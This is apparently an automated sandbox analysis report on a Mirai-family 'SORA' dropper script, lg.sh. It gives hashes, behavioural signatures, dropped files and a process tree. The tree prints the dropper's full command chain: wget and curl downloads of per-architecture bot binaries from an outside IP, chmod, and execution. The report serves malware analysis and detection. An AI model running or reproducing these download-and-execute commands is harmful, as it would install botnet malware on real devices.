Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
03-11-2024 14:37
Static task
static1
Behavioral task
behavioral1
Sample
lg.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
lg.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
lg.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
lg.sh
-
Size
2KB
-
MD5
bc5d26efda012ff6acde82ad9df727ba
-
SHA1
ca673c3c525f1e35bcab62dc95a426620d844850
-
SHA256
f90209498b787e94cb54a58c548994667bc712526f541bf86142a14ac6cd3bcf
-
SHA512
2718a545aa565f06edd6dae806b09dfa0a2e57ee4a21f954d5295400691daf5db8b69d7b429c8614fa1d1dc50be5446caccdce7662d448b5fea4d4a32818dc55
Malware Config
Extracted
mirai
SORA
Signatures
-
Mirai family
-
Contacts a large (33933) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 723 chmod 734 chmod 740 chmod 805 chmod 758 chmod 869 chmod 886 chmod 857 chmod 863 chmod 777 chmod 816 chmod 835 chmod 875 chmod 880 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 724 robben /tmp/robben 735 robben /tmp/robben 741 robben /tmp/robben 759 robben /tmp/robben 779 robben /tmp/robben 806 robben /tmp/robben 817 robben /tmp/robben 836 robben /tmp/robben 858 robben /tmp/robben 864 robben /tmp/robben 870 robben /tmp/robben 876 robben /tmp/robben 881 robben /tmp/robben 887 robben -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben -
resource yara_rule behavioral4/files/fstream-1.dat upx behavioral4/files/fstream-4.dat upx behavioral4/files/fstream-5.dat upx behavioral4/files/fstream-7.dat upx -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself 2dj14001amgbc5o 806 robben -
description ioc Process File opened for reading /proc/676/exe robben File opened for reading /proc/700/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/862/exe robben File opened for reading /proc/810/exe robben File opened for reading /proc/492/exe robben File opened for reading /proc/547/exe robben File opened for reading /proc/871/exe robben File opened for reading /proc/878/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/696/exe robben File opened for reading /proc/867/exe robben File opened for reading /proc/875/exe robben File opened for reading /proc/792/exe robben File opened for reading /proc/800/exe robben File opened for reading /proc/817/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/506/exe robben File opened for reading /proc/877/exe robben File opened for reading /proc/695/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/869/exe robben File opened for reading /proc/883/exe robben File opened for reading /proc/884/exe robben File opened for reading /proc/807/exe robben File opened for reading /proc/697/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/870/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/548/exe robben File opened for reading /proc/694/exe robben File opened for reading /proc/788/exe robben -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 728 wget 731 curl 733 cat -
Writes file to tmp directory 26 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sora.i686 curl File opened for modification /tmp/sora.arm5 curl File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/sora.arm7 curl File opened for modification /tmp/sora.ppc curl File opened for modification /tmp/sora.ppc440fp curl File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.sh4 curl File opened for modification /tmp/sora.i468 curl File opened for modification /tmp/sora.i686 wget File opened for modification /tmp/sora.arm7 wget File opened for modification /tmp/sora.m68k curl File opened for modification /tmp/sora.x86_64 wget File opened for modification /tmp/sora.x86_64 curl File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.ppc wget File opened for modification /tmp/sora.m68k wget File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.sh4 wget File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/robben lg.sh
Processes
-
/tmp/lg.sh/tmp/lg.sh1⤵
- Writes file to tmp directory
PID:697 -
/usr/bin/wgetwget http://93.123.85.190/bins/sora.x862⤵
- Writes file to tmp directory
PID:701
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:711
-
-
/bin/catcat sora.x862⤵PID:722
-
-
/bin/chmodchmod +x lg.sh robben sora.x86 systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-46Yggv2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:724
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:728
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:731
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:733
-
-
/bin/chmodchmod +x lg.sh robben sora.mips sora.x86 systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-46Yggv2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:735
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.x86_642⤵
- Writes file to tmp directory
PID:737
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/catcat sora.x86_642⤵PID:739
-
-
/bin/chmodchmod +x lg.sh robben sora.mips sora.x86 sora.x86_64 systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-46Yggv2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:741
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.i4682⤵PID:743
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/catcat sora.i4682⤵PID:756
-
-
/bin/chmodchmod +x lg.sh robben sora.i468 sora.mips sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:759
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.i6862⤵
- Writes file to tmp directory
PID:761
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:768
-
-
/bin/catcat sora.i6862⤵PID:776
-
-
/bin/chmodchmod +x lg.sh robben sora.i468 sora.i686 sora.mips sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:779
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:781
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/catcat sora.mpsl2⤵PID:804
-
-
/bin/chmodchmod +x lg.sh robben sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
PID:806
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm42⤵PID:813
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/catcat sora.arm42⤵PID:815
-
-
/bin/chmodchmod +x lg.sh robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:817
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm52⤵
- Writes file to tmp directory
PID:819
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/catcat sora.arm52⤵PID:833
-
-
/bin/chmodchmod +x lg.sh robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:836
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm62⤵
- Writes file to tmp directory
PID:838
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/catcat sora.arm62⤵PID:856
-
-
/bin/chmodchmod +x lg.sh robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:858
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm72⤵
- Writes file to tmp directory
PID:860
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/catcat sora.arm72⤵PID:862
-
-
/bin/chmodchmod +x lg.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:864
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:866
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/catcat sora.ppc2⤵PID:868
-
-
/bin/chmodchmod +x lg.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:870
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.ppc440fp2⤵PID:872
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.ppc440fp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/catcat sora.ppc440fp2⤵PID:874
-
-
/bin/chmodchmod +x lg.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:876
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:877
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/catcat sora.m68k2⤵PID:879
-
-
/bin/chmodchmod +x lg.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:881
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.sh42⤵
- Writes file to tmp directory
PID:883
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/catcat sora.sh42⤵PID:885
-
-
/bin/chmodchmod +x lg.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh4 sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:887
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
28KB
MD5fa5457b7546c1b7060c30bde3f8649ca
SHA17c75f6463c36eaebc4719f47d8047e5195a85057
SHA256d3f2f30efffec0f49e28199c60b2819a3e831ae0ba920abd2c5ece5e4bfb3adf
SHA512f012d61a479015af70447b1c3bd2a48c2977691f9a180f4f5c3340b034c65d69782299cb8459e92e3a18dcadfa3078c8b1c613593170f9fa95dd53ba36050c21
-
Filesize
28KB
MD5ec332610b0ca5b634c097ed14f42eedc
SHA1abcbd111601f4165c400e9db36fbf20339e37170
SHA2562bfdc588e26d5f6ac54ca3330ced3ab2bfc9bafb98cdd91fd017180dd5848b3a
SHA512f41f54e2aca4a5dfa3d7bcbad45963aa943fa3b6536c34f7c92c7c79894f1009ef5ab13cfed39b74ffc614791b77497689bcbe71edfefecb20497d873c92d1b0
-
Filesize
212B
MD583ab6cd9a67528bbc6f4f360cb7f8d83
SHA107e8f17209e0569aab39f062568ff0090d9b20d4
SHA2563ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
SHA512171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f
-
Filesize
28KB
MD5d356657b6ea7a715b60217a914eb6ca8
SHA1b276b1a91895c3025e9f9d64227205dac79c8ef6
SHA256b0758e5e7fde30404ec43dd5fba21253735464062e8a10f0876193d18194fe22
SHA5123b0ab5d1282c9d2ea18ed0fc78aeabafde6c16fa094d53d39a67d3316482da0cffa444dd5dc14aeefb547ce2f789480caa5bb514cb4a26787c7441ba8862e262
-
Filesize
64KB
MD5fb3d051f41bd7347aeff64980f2d100b
SHA15261ff91b8d99d6b8f5f647e33aad29b90cee973
SHA25619f4b46d738fa23ff571db081cea0bf34509b9799de2116853e77691faaebec1
SHA51282dd9805571030fc4a56a8d5838f5ee3fe1b162f059c905a48f37abcc4dc58442e1e909ab4a2352d690af8ac306eafe4d89cb87f37baec8a8136d48e884be4dd
-
Filesize
27KB
MD500eff503439515d9b12b9c068367cb80
SHA182d68f2b1ffca8558458c1b858599542a67d8bbf
SHA2562962b987b00b166299f9a73f7ccb8dc02b4208266465b41f6b1c9c28277d7276
SHA5123800bc5a8f3983fc50813c49c906203af6528ff3eb97b4818a8632085562c25eab1c691edb5dcdc96c8d2c3f25784a41897ec8a52c042d391899a310224d50f5